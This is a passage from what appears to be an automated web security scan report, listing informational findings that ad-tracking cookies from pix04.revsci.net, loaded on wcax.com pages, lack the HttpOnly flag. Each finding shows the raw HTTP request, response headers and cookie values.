GET /E05511/b3/0/3/0902121/281102501.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Flink.asp%253FL%253D398823%2526affname%253DWCAX%2526adtag%253DNews%2526conttype%253DL%2526baseurl%253Dwww.wcax.com%26DM_EOM%3D1&C=E05511 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/link.asp?L=398823
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc2dfb1&0&&4d9d35c9&00f8712b16a2747053422af6cef97d9a; rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; udm_0=MLv39SEJaSpn5l6paFGF4PE3PRxA2jF7YYC1PcJb22pwwouGCTcavWRp5gDOVMIHzRWjEwivKG4y8bEh5C5wLlcCwDPbMqRj2DXkTGhDQ89mbFozYsJjVTEuEe/h536ulQSV9ZLPlq3zvY5wI7GSTD5BVaK5PSi5iO04v1pj7PDeGv3V9gM7ANffp4aB2AM/h4hv+T5HgJbAtgb7HqevDR626jrhmXkk69RBMAXp1DdSPYAPQJHJvn/rzZsMfoFkbubkYHmjVEVLasemhsTEo1Serlxmbl0IVn7AefJE4seiDicdI2wontu9IZLwVXc02bCqrYwtitQsQNji6bUMTo/0rT2RSfwdDGJa7xU+fFcroN7218oqxT9x7L35X5DfVBaDrfv29icbjnSxpOmzgnRCNJmalrXQiknC6CGG5dH7zlYBBxkva9nw22SQmXdD/88SrbpYrpKf+UKKtKwts/IjOB6Eazt2PobI4tp2kA5KVtcoWhxRPIHmFCOBaTtO1X2GbaZEI8S14df58UYAZy0ZN5YWWI+O3XTTnts/cczEz7N38q1uFXosRoM5IgYSR04JtFLNDfl6qTI/rRuBVZdxRsDurKPAe1hfxGdmi43q8kUTMdL/6iojPW8Bpg1leE5rV9I+r1+ddGv5HLF1pTh3a+c58Cju7a0VXEHncV9/jXQM/WWwB3k1nJ2JDj9LnMNfD3topntubRGUl2IHm/cuf4Pmw6IoBenU93ZANgR8RJmAS9jO3pq6W15G8DajMvT2Me5/680mvSKsbn8Ovx2R1L4UTH6Km0BSQD2a0DdQOlZLvCu6QyaEfjRkLzHqiwqSJq4cGLPTom4fK3zWi7uWVgSjuYevdiogpfoKxnEMYxVDqJSS06gQ3rnQQxFCYVdSRj2Y9kY+SYa7XCqnZrKPGeBwqT0TlcOMQ0TSbcFBKbc3OQaYo4/OTIjOJKFQ9uSW7SYRUSMKG538HQcbyYKwIxW6hAYLW9Q1y9MJ/g328nZvUZ7bZMGBwpxqeVab0uTo3M5eA37y1R62xsVIrL3T8Y3jsAk6da8WuMg8qhQM77GcgsxMV8+8QbHPrn7mYnL5YvFO6V+LFGqyfa3btS08ujZPpHweBvJ8FjgxIVDr32Hjid6G; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc53c39&0&&4d9ebfcb&00f8712b16a2747053422af6cef97d9a; rtc_PzOz=MLsvr1UucS5jJxFcgo4AHK1+XkG5rAlP/Aq7SD8BxfGVHQohJ6FrqzzS13LtwLGPNU614wt1b+MA5RJdLaRrQUnmpA7Dn8HsEBQ22XijZ0avgB0uN3VFJc64A0JJWRHRyM1PJ99bh6wdpsfpwx4TBTmD3T+5LQCgxpcHmMgHZ8wIf5AXPQBlECGUWObVTp2Wl2qTjza4WAnSDu2o+g30biDqE3K7+WYa4uP79fIQxTnzUkcD2C2lBhcwN6MpTkcpeY7mSvqGCBrNPjyYsVMWxl5QK8tfyjKMF+FnU4w5VEBlKqw9THqvw7/hMLzC7Yn7urpFhINBgaNR6S81tE7rvXjW74KR31Dequ7esAsSMNxolukA9NP8blDzaV5mTOn/iSbi2cjC8JofbZ+Fcqks+HS7qUoBl5mk9dKKa7qhzXQ=; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; rsi_segs_1000000=pUPFJ0OBb3IMlZ8MYZlL6auMNYyIammiwEatDUBeSoA10YIeLKow9nlpJKVQ37I6YvuDT+H5/TzuIAPlAEdqo0FJzTVXvMkmPE4TwtBQ8OlZ90OHgdmWmGKDVcyIM1WCBrxt6ctuxa5T3ak16E9UMwEaTFGGCvQD+D51DLLEndcJCnpZVgB9CGZKrncjm5U4QXVDSQzPQkN8yYBk++EmhkF+QS6pQ6WDbGNezyszIInsZx52AtF0J56A7uajqKbIzuyoBX4tb2GWPb+2gInTsNzVGpgLc5BY

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_PzOz=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFOEOFrwIQlrWdY9uoSEqZE8HQlp3QApINJwOPRQb1v4U4HgAfLAZUKGvcQE2W8ubQZ1PdqfSypuUx+zGRJapXG7SRnwOtt4XQFpRYqW2GMjvmS5/wVuCAf4vuLvqrY9q7tnjwFKu7X/+0XaEWf1bcq5+rD++cij37ozDT3SrHBInr52nwBgt2mllq1WDukUJxYg7+LP4yRXpZlK/KwBycfpTd0rGJZ11++gXBgj2MDfZntljCgdWeOVZDJUxmPFgwZCepKjf/yQt/91epw2ZIWGY3EKvwcA==; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:34:08 GMT; Path=/
Set-Cookie: rtc_fD38=MLsv7lMucG5r51i93r4IM9TGU8HE2WihBMXGQkSn286NMFwCGETcqMzfbXziKmcrz0rlT3NXbQ2UQPY347g27oCUANSCq8NZjBisn3QA7dNcEnrj5CvIhcVabHvel3/DSTbq/1y+LSORX9Qb6uZ+/xxsqgjGObwCJtl4lmIRkmOq6dknFXic9AzqI7pWtaOhz0lDDVBT+EfLWQtWQim8GH5HVWELDEpJEbLUw6Jg04VvNANMm8nCbZHaeGWCCfCOJbWK/sAxQ5NGzpD8J6ji9kCmwOAU7AzRXpk9EHHa8hTwgWqMFwsDaB5Azfvk7Xq22OLEfgzLVUKiq8n5G0ivSFg4h3SF/AKFKQO20nm04/QvLfz3c+h6IQcDKx9dpliz4vdsDT1sbxJktw7XGFSOZbQ2gK+V9dLFQSs0EnPRWX/E30E=; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:34:08 GMT; Path=/
Set-Cookie: NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c40&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; Domain=.revsci.net; Expires=Sat, 07-May-2011 12:34:08 GMT; Path=/
X-Proc-ms: 30
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:34:07 GMT
Content-Length: 413

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs = ['E05511_10410','E05511_10412','E05511_10033','E05511_10004','D08734_70006','D08734_72076','D08734_72077','D08734_72082','E05511_50085'
...[SNIP]...
6.133. http://pix04.revsci.net/E05511/b3/0/3/0902121/285224161.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05511/b3/0/3/0902121/285224161.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05511/b3/0/3/0902121/285224161.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D189321%2526affname%253DWCAX%2526adtag%253DSales%25252520-%25252520Travel%2526conttype%253DC%2526baseurl%253Dwww.wcax.com%26DM_REF%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fstory.asp%253FS%253D465801%26DM_EOM%3D1&C=E05511 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=189321
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; udm_0=MLv39SEJaSpn5l6paFGF4PE3PRxA2jF7YYC1PcJb22pwwouGCTcavWRp5gDOVMIHzRWjEwivKG4y8bEh5C5wLlcCwDPbMqRj2DXkTGhDQ89mbFozYsJjVTEuEe/h536ulQSV9ZLPlq3zvY5wI7GSTD5BVaK5PSi5iO04v1pj7PDeGv3V9gM7ANffp4aB2AM/h4hv+T5HgJbAtgb7HqevDR626jrhmXkk69RBMAXp1DdSPYAPQJHJvn/rzZsMfoFkbubkYHmjVEVLasemhsTEo1Serlxmbl0IVn7AefJE4seiDicdI2wontu9IZLwVXc02bCqrYwtitQsQNji6bUMTo/0rT2RSfwdDGJa7xU+fFcroN7218oqxT9x7L35X5DfVBaDrfv29icbjnSxpOmzgnRCNJmalrXQiknC6CGG5dH7zlYBBxkva9nw22SQmXdD/88SrbpYrpKf+UKKtKwts/IjOB6Eazt2PobI4tp2kA5KVtcoWhxRPIHmFCOBaTtO1X2GbaZEI8S14df58UYAZy0ZN5YWWI+O3XTTnts/cczEz7N38q1uFXosRoM5IgYSR04JtFLNDfl6qTI/rRuBVZdxRsDurKPAe1hfxGdmi43q8kUTMdL/6iojPW8Bpg1leE5rV9I+r1+ddGv5HLF1pTh3a+c58Cju7a0VXEHncV9/jXQM/WWwB3k1nJ2JDj9LnMNfD3topntubRGUl2IHm/cuf4Pmw6IoBenU93ZANgR8RJmAS9jO3pq6W15G8DajMvT2Me5/680mvSKsbn8Ovx2R1L4UTH6Km0BSQD2a0DdQOlZLvCu6QyaEfjRkLzHqiwqSJq4cGLPTom4fK3zWi7uWVgSjuYevdiogpfoKxnEMYxVDqJSS06gQ3rnQQxFCYVdSRj2Y9kY+SYa7XCqnZrKPGeBwqT0TlcOMQ0TSbcFBKbc3OQaYo4/OTIjOJKFQ9uSW7SYRUSMKG538HQcbyYKwIxW6hAYLW9Q1y9MJ/g328nZvUZ7bZMGBwpxqeVab0uTo3M5eA37y1R62xsVIrL3T8Y3jsAk6da8WuMg8qhQM77GcgsxMV8+8QbHPrn7mYnL5YvFO6V+LFGqyfa3btS08ujZPpHweBvJ8FjgxIVDr32Hjid6G; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc53c39&0&&4d9ebfcb&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; rsi_segs_1000000=pUPFJ0OBbwIMV58ceRtDq2qIGKEAWFhJ0QSlgYlQhEc6MiO0UzrToS2ouz039v0EpRxSyNYjSDalBGWx+zsRJJJHGffRX0UbHd1GuLNHKym8P0LbSVFlz/vsh0oin7o3Bbz1tXhw1TpqAvMZ1v1Lv8NerqkTDVdntzlNMPA0y2boUy5Y7voYnl6yfuLpEimlP0Vz1lb/RjUOi7bq4C75IyJ9opxCrX7etWJLMemJm1S0MAAhzke2cvgVu5WIe/YGfsp8J+o9uf07FPUtKpgVTwfiUnECc+6tU9t1bIy34gP5vFQ9MLExPBaUzGkSiNfYaEM=; rtc_qH7k=MLsv8SUucA5nprADo8Nq7dG30MEszwLosfaz5fWZ65hV2fUOBnLo+BWjQ4EZLeotOXo28EHvDL1pbNNARLmM/MYdyRgTqxD/lMxcrQFOpPrNSkm1eU9Lpin2x9jJdbuKtNkElLVE051AluTuDnRDieHkyvaZNMAKnMOnxWWEt8Bj2ZwKECyW0ZU/wYMurf3oH/xJXerILxH/z3W8t0as+z/3fJ8azYrm12OFroSv3dkRCrzSdbJ66D0Dt9pfio56UesBj+1SLyZM8fJnR4MNTI0wzO41bbP1Wws8UaQ/4AuRitULgKokR7aSBTL/fY/adIXHS4s1pNFsz2sFWsx5QC99bfHaXZ4zQpVwoJJzZTD9kvrdMDCgOltk2DQT2lKk0FDcxaMKw7/KxVDLSlk+RBRhjcN1Xj/tWNoaFV9sbtoigkBD83eZUXFOzMKJ6uEXoIZDzkIGr0PoLrM+t2W7ciP0X6oF/RXzuO7qRtCJao66pQ0=

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_qH7k=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF50mBb3IQT7uItGE2XZ+BegxW06NpBWaN1BDoY9v5vw/Z0o0s9uNg2v9kDss6IrN6JaGAHSmROtUTwMbYBi9rjjj9HIlKSoiQkCQtivyaNS7jlRvuw2D0aUM8HqYeBaSkzgIPkJtKzgPSBYiT8mIKXc9qOf3x8FTXKZXGtj75c9yYA2gNT8xdMKeaKHqlgzQfACMdS8qviDrP1XXXVqf4Jtikz7mDvPXWENiHlBqaAaDH5SSTvxqtMy2Fr3gcck84B/fhC1+A/zQA0P4EM5L8kozQV3oP2NUKPO6wg85NJ5N7yUnU/8+4mOZYgY6B; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 13:16:00 GMT; Path=/
Set-Cookie: rtc_EM4g=MLsv7iUucA5nprADoxMUZ9S30MEszwLosfaz5fWZ65hV2fUOBnLo+BWjQ4EZHeotOXo28EHvDL1pbOBARLmM/MYd6RgTq9u+iM7/hQBOpPrdSk21eU9Lpyn2txgsRP0c/xxljHTX7BOLqY4BgQCs3lhGEmvvtSk5ED4MMDjv8yVDLYK7pDAruXeuMbqWcYC2y8NbEmpQplW1r3QCDBMDKlKs8h8jhookQYAMg5VB8aLCKuUNtwB34ZoQt95cCo91UbMwGaFSr6asrq672fdH+xzIkZMRNy3EgFEOFuAASeQu0Vmfb3m3aVzU53rLUI0DvmE+6V5MRfJFqiXP3mwBN1JQOHtAvauFYtPfu791mq8kh/67bj1dtkYfONjJz46HXLiLXT9vUqTOR8dIMLhwh5QgSMzCmH/uFvWfD3l3pX8QaFC1vCAqFk8T34QxWHhhMKOHgnb4Ef8/sjmrJ7cwLNcYjHKHaF1zK4a+nl+D77j2; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 13:16:00 GMT; Path=/
X-Proc-ms: 23
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 13:15:59 GMT
Content-Length: 653

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs = ['E05511_10410','E05511_10412','E05511_10033','E05511_10034','E05511_10004','D08734_70006','D08734_70043','D08734_70072','E05511_10424'
...[SNIP]...
6.134. http://pix04.revsci.net/E05511/b3/0/3/0902121/316223818.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05511/b3/0/3/0902121/316223818.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05511/b3/0/3/0902121/316223818.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Flink.asp%253FL%253D398823%2526affname%253DWCAX%2526adtag%253DNews%2526conttype%253DL%2526baseurl%253Dwww.wcax.com%26DM_REF%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fstory.asp%253FS%253D503137%26DM_EOM%3D1&C=E05511 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/link.asp?L=398823
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=a8cd58cd77607ac5f39b5bbf5c533d34; rsiPus_0="MLuBM15WBV4EFlcCEVJFHBMURFBURJY9EVhHwEBWUhAaEsGQdh2fCjuxAnVgfF7gi69vaww5dGk="; rsi_us_1000000=pUP1Jk+jPwIQlm3EfKIIeTUeF/JvyQbq8mWZPtA01FS2ee8dNFxF4G+GnAMn9WcrwrlxaFqY0O/f2fJMysjjHKnHR1AyLyrV5YaNDkJ/Sz9iTSLWnrcqaeW9JQdk5xB8c5TT7BS5boeRjEXk88graUNSSoQBET1n8cYfeqxRms6DsyWntJXFg4q6t8nlTBXRhlT3ZnaU2QqHtEwjbkGX2cuE5sFvvxfDc0P1x1/YkINpgXca0zgdRWoC3FkTquy/LDHspJLb+6ye52i0gFZ8jaiDtEDQhwQMsqBgw+jJJuD5Y2BkMUQ3RbgfQY9C5tK/FmqYRFZ52k9CfvQzFcVI5PWBlmX8RPSEQN1nnPjNs01GIqNMz9awgCd4dP+vDcMlLAiX5AAQodEidAYP+DcEiCL0bX2IgR07U3iUVDf66rT8NwEy8uPRt4Q7j86Eak+GQEpZDNk7iHnphbuIOYn854kFrhr9LHPGiRTBN9SDG02GRydnp8QEtYyWpdxNzpAz9+BJpIyWBHWSXJU/lT8YMZc0rZpJ/9pq+rino+75Z7tI/xKhizjb7SgX/Zn1a38AtieO7F8k1YX9JM6IqYnbfNnzinjIJ/gcLiFPu6S+z7Sa5mI3O/WshNmzmWQg0GiPE4fCQCsyTxRgJ0dq2w==; NETSEGS_E05511=379226250c6302c7&E05511&0&4dc53ba8&0&&4d9fb2f3&00f8712b16a2747053422af6cef97d9a; udm_0=MLv39SEJaSpn5l6paFGF4PE3PRxA2jF7YYC1PcJb22pwwouGCTcavWRp5gDOVMIHzRWjEwivKG4y8bEh5C5wLlcCwDPbMqRj2DXkTGhDQ89mbFozYsJjVTEuEe/h536ulQSV9ZLPlq3zvY5wI7GSTD5BVaK5PSi5iO04v1pj7PDeGv3V9gM7ANffp4aB2AM/h4hv+T5HgJbAtgb7HqevDR626jrhmXkk69RBMAXp1DdSPYAPQJHJvn/rzZsMfoFkbubkYHmjVEVLasemhsTEo1Serlxmbl0IVn7AefJE4seiDicdI2wontu9IZLwVXc02bCqrYwtitQsQNji6bUMTo/0rT2RSfwdDGJa7xU+fFcroN7218oqxT9x7L35X5DfVBaDrfv29icbjnSxpOmzgnRCNJmalrXQiknC6CGG5dH7zlYBBxkva9nw22SQmXdD/88SrbpYrpKf+UKKtKwts/IjOB6Eazt2PobI4tp2kA5KVtcoWhxRPIHmFCOBaTtO1X2GbaZEI8S14df58UYAZy0ZN5YWWI+O3XTTnts/cczEz7N38q1uFXosRoM5IgYSR04JtFLNDfl6qTI/rRuBVZdxRsDurKPAe1hfxGdmi43q8kUTMdL/6iojPW8Bpg1leE5rV9I+r1+ddGv5HLF1pTh3a+c58Cju7a0VXEHncV9/jXQM/WWwB3k1nJ2JDj9LnMNfD3topntubRGUl2IHm/cuf4Pmw6IoBenU93ZANgR8RJmAS9jO3pq6W15G8DajMvT2Me5/680mvSKsbn8Ovx2R1L4UTH6Km0BSQD2a0DdQOlZLvCu6QyaEfjRkLzHqiwqSJq4cGLPTom4fK3zWi7uWVgSjuYevdiogpfoKxnEMYxVDqJSS06gQ3rnQQxFCYVdSRj2Y9kY+SYa7XCqnZrKPGeBwqT0TlcOMQ0TSbcFBKbc3OQaYo4/OTIjOJKFQ9uSW7SYRUSMKG538HQcbyYKwIxW6hAYLW9Q1y9MJ/g328nZvUZ7bZMGBwpxqeVab0uTo3M5eA37y1R62xsVIrL3T8Y3jsAk6da8WuMg8qhQM77GcgsxMV8+8QbHPrn7mYnL5YvFO6V+LFGqyfa3btS08ujZPpHweBvJ8FjgxIVDr32Hjid6G; NETSEGS_F08747=379226250c6302c7&F08747&0&4dc53c39&0&&4d9ebfcb&00f8712b16a2747053422af6cef97d9a; NETSEGS_L09857=379226250c6302c7&L09857&0&4dc53c3d&0&&4d9fd0ee&00f8712b16a2747053422af6cef97d9a; NETSEGS_J06575=379226250c6302c7&J06575&0&4dc53c9e&0&&4d9fd931&00f8712b16a2747053422af6cef97d9a; rsi_segs_1000000=pUPFJkOBL3IQVvUbea77UACbRIFnakVmUA+HR+nmRzxcnjU8Au/noS2ouxUK6pw26Doqi/RzbzhgLhbB0DMyapLQzeT2x4D8v6WaOTFPmqLoHRbjefGo5DRhBJWpmMATsNqLrrq2mc21v8NBpMun4I8+oSRke9cSEdXcu+3veueFcBzDVkpF+v8Ch970caAscd6hxtvZsT7ppt7+S6XInEFBmseHYrM+6D3jHgWuSeWBaFjcqMvd3fn6QLIxauWdjEYgS+pGwFdssGkY+qrdhwpzkfSpvrWEETsLafzEAfG1fx9zowU5mvPKnaGXmg==; rtc_QEfD=MLsv8SUucA5nprAD264UWVoPI7fHKbGZaCQWuLR8p51z2DQ30G6uId0c9nDR2NMmzuXDJn0g0OQE4KL99Qp8zilVvFLegxD/FKzZzKAFPPXNSkm1eU9Lpin0xxgsRv18t9kElLVE051AluTuDnRDieHkOf9TCWukp+fyOVqRG+FbypZ1lOmeCoTp4pvl4W2xqmQFAWY4P5lr/3fAt0as+z/3c58a0YrmF2CFroRB+arCLp2/A/hlSL3YhoR/5MNsKutYjoQwhJscXN5vRZ/qEN/s+mTleYT1e0XRQJw7SG6Pb2foVCrRD5zlxI6M9xB55wUh10H6ft0R/IG6wmIogiyFxbz9L/rVYw1C4gDlVZ0sYCbRWJ8laUnjTGKqfAWyeIdxhd2ou3ym15NGUzxTHSbE3gGfUiwP1c7Rn8JWxY041sNP9IpNYh6qgR92imO/5zl3mFWhFNjp7cfhWA2MYorGw1uHV11zKR6Oij8mYbuD

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rtc_QEfD=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPFJ0OBbwIMV58ceRtDq8maNy+QEHhmUA+HR+nmR+wNkracs3b0+sttkvcnG4FQF1YFME4zlfRD4gH9GEcK40FJegXl+5D8vFQar78P9XhIAzqXffGoRAe2X6QrAftrLLzt4AOKq3/LIjvpHS425/AXqL0pwSuIw13EQH79I3WYhxGSmqQ5v+WDhpEaaEAgtHJ6pKXCfyjkfbaXvAhJilWkfBI9ACFC8OoPrFURlqw8t7yAaDCXuToKNVaHV881VmBTFipN3Fw6sL/kNO6Dj/PrFkjVxaxh866sfh+Na3Jm2FDom4UcKgaKXBGXnA==; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:38:15 GMT; Path=/
Set-Cookie: rtc_7rob=MLsv7iMucD5npqgDC0e9A9S30MEszwLosfaz5fWZ65hV2fUeqlt8L6cj/qSrEX5/s8WnsS00IKdsJuIlbI0n6i5mCFMCk/DX0ZUZhQNOqEqv6ZJx9H7x4sWwa0LKdLu6EDs2kZV8061wlsTiDnxDiSHnPc+ZMsR67OfyuVuRW+F5iRkzlcSm/OepgsdXo88JhULWLh4a8A6PyDf903KoAeUpitP4N3NHYKrDRno2A2G7cKcnRxKVxwMcXyZShLrki39i5R2d0TDalpcI3lQLOzWjSjYjgqHDlwIgVLwfpXxffwb2O+079hdYhGZkfhCjDm663gi652dE4tuvo0Wk6TBEetIB0B851bjeN97FHa1+AcoTzJ7vr9miJTCPeFwcdknuxboNaAb30giKRMoAYZA4YbUzrt9+lX/Y4xR8j5Zql80uS1MWG+qf2bN9oL3Kb6AfYwp9dbQvTTz1fmKCvi1xxnAWV3rx4+GReBq6rIo=; Domain=.revsci.net; Expires=Sun, 08-Apr-2012 12:38:15 GMT; Path=/
X-Proc-ms: 30
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Vary: Accept-Encoding
Date: Sat, 09 Apr 2011 12:38:15 GMT
Content-Length: 593

/* Vermont 12.4.0-1132 (2011-03-01 13:30:46 UTC) */
rsinetsegs = ['E05511_10410','E05511_10412','E05511_10033','E05511_10004','D08734_70006','D08734_70043','D08734_70072','E05511_10424','D08734_72076'
...[SNIP]...
6.135. http://pix04.revsci.net/E05511/b3/0/3/0902121/354226275.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /E05511/b3/0/3/0902121/354226275.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /E05511/b3/0/3/0902121/354226275.js?D=DM_LOC%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fcategory.asp%253FC%253D18197%2526affname%253DWCAX%2526adtag%253DNews%2526conttype%253DC%2526baseurl%253Dwww.wcax.com%26DM_REF%3Dhttp%253A%252F%252Fwww.wcax.com%252FGlobal%252Fstory.asp%253FS%253D503137%26DM_EOM%3D1&C=E05511 HTTP/1.1
Host: pix04.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.wcax.com/Global/category.asp?C=18197
